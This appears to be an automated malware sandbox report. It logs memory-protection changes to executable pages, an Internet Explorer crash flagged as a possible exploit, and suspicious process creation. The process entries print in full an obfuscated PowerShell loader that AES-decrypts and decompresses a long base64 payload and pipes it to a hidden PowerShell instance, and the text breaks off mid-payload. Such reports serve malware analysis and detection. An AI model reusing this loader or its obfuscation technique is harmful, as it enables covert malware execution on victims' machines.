NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077186000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076ba0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772af000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772bb000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe117000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe4000 process_handle: 0xffffffffffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 3060 crashed
__exception__ July 25, 2023, 10:36 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 98494000 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 98499952 registers.r11: 98495760 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1927509622 registers.r13: 0	1	0	0

Application Crash

Process iexplore.exe with pid 3060 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

July 25, 2023, 10:36 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	C:\Windows\System32\cmd.exe /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell -
cmdline	powershell -
cmdline	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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